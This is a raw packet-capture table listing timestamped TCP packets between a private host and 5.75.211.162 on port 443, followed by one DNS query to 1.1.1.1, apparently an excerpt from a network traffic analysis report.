Sep 26, 2024 20:15:49.114901066 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.114936113 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.114959955 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.133428097 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.133485079 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.133604050 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.133622885 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.133673906 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.135241032 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.135283947 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.135327101 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.135335922 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.135377884 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.135416031 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.158092976 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.158139944 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.158221006 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.158233881 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.158287048 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.158813000 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.158855915 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.158895016 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.158902884 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.158941984 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.158961058 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.166721106 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.166769028 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.166815996 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.166826963 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.166867018 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.166884899 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.178495884 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.178538084 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.178595066 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.178605080 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.178658009 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.193182945 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.193228960 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.193298101 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.193315983 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.193330050 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.193366051 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.201797009 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.201843023 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.201915026 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.201925993 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.201960087 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.201987982 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.220771074 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.220829010 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.220890045 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.220902920 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.220942974 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.220967054 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.221905947 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.221961021 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.221987963 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.221997023 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.222045898 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.244554996 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.244597912 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.244703054 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.244723082 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.244776964 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.252902031 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.252955914 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.253031015 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.253042936 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.253058910 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.253082991 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.254517078 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.254560947 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.254595995 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.254602909 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.254625082 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.254645109 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.264808893 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.264853954 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.264914989 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.264924049 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.264983892 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.264983892 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.279983044 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.280025959 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.280091047 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.280132055 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.280148983 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.280173063 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.289053917 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.289098978 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.289151907 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.289165020 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.289190054 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.289210081 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.307461023 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.307504892 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.307557106 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.307569027 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.307595968 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.307617903 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.331286907 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.331329107 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.331368923 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.331381083 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.331410885 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.331430912 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.332082033 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.332127094 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.332148075 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.332155943 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.332182884 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.332199097 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.339782000 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.339824915 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.339869022 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.339890957 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.339929104 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.339941025 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.340857983 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.340900898 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.340938091 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.340956926 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.340991974 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.341015100 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.352394104 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.352435112 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.352482080 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.352502108 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.352525949 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.352546930 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.367716074 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.367773056 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.367835999 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.367860079 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.367889881 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.367924929 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.375788927 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.375829935 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.375866890 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.375875950 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.375901937 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.375921965 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.394351006 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.394411087 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.394431114 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.394453049 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.394479990 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.394499063 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.418510914 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.418581009 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.418670893 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.418705940 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.418737888 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.418759108 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.420130014 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.420186996 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.420217037 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.420226097 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.420255899 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.420286894 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.427021027 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.427071095 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.427150965 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.427165031 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.427196026 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.427218914 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.427792072 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.427875042 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.427876949 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.427908897 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.427934885 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.427947998 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.445173979 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.445216894 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.445255041 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.445265055 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.445292950 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.445307016 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.454152107 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.454196930 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.454229116 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.454237938 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.454272985 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.454292059 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.463326931 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.463407993 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.463429928 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.463438988 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.463466883 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.463485003 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.505253077 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.505297899 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.505353928 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.505366087 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.505418062 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.506247044 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.506289005 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.506320000 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.506329060 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.506361008 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.506397963 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.507044077 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.507083893 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.507117987 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.507126093 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.507163048 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.507183075 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.513973951 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.514017105 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.514062881 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.514102936 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.514126062 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.514309883 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.525703907 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.525748014 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.525795937 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.525831938 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.525851965 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.527842045 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.532190084 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.532232046 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.532273054 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.532311916 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.532335997 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.532916069 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.541222095 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.541265011 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.541296005 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.541318893 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.541338921 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.541363955 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.549880981 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.549926043 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.549957991 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.549993038 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.550013065 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.550035954 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.592243910 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.592286110 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.592330933 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.592371941 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.592395067 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.592557907 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.593008995 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.593082905 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.593102932 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.593123913 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.593143940 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.593170881 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.593879938 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.593925953 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.593964100 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.593992949 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.594013929 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.594043016 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.600977898 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.601026058 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.601059914 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.601100922 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.601121902 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.601142883 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.612720013 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.612766027 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.612799883 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.612837076 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.612855911 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.612885952 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.619148016 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.619173050 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.619219065 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.619272947 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.619294882 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.619803905 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.628222942 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.628247976 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.628318071 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.628351927 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.628420115 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.636945963 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.636965990 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.637058973 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.637103081 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.637149096 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.679394960 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.679419041 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.679546118 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.679605961 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.679625034 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.679651976 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.679657936 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.679672956 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.679713011 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.679749012 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.680995941 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.681014061 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.681052923 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.681086063 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.681106091 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.681123972 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.681143999 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.681150913 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.681432962 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.681452036 CEST	443	49764	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.681466103 CEST	49764	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.697196960 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.697241068 CEST	443	49765	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:49.697330952 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.697629929 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:49.697649956 CEST	443	49765	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:50.362186909 CEST	443	49765	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:50.364989042 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:50.365557909 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:50.365570068 CEST	443	49765	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:50.368472099 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:50.368472099 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:50.368480921 CEST	443	49765	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:50.368501902 CEST	443	49765	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:50.813509941 CEST	49766	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:50.813555002 CEST	443	49766	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:50.813679934 CEST	49766	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:50.814006090 CEST	49766	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:50.814028025 CEST	443	49766	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:51.036273003 CEST	443	49765	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:51.036360025 CEST	443	49765	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:51.036362886 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:51.036453009 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:51.038073063 CEST	49765	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:51.038099051 CEST	443	49765	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:51.479974985 CEST	443	49766	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:51.480046988 CEST	49766	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:53.167377949 CEST	49766	443	192.168.2.5	5.75.211.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 20:14:23.214566946 CEST	64022	53	192.168.2.5	1.1.1.1
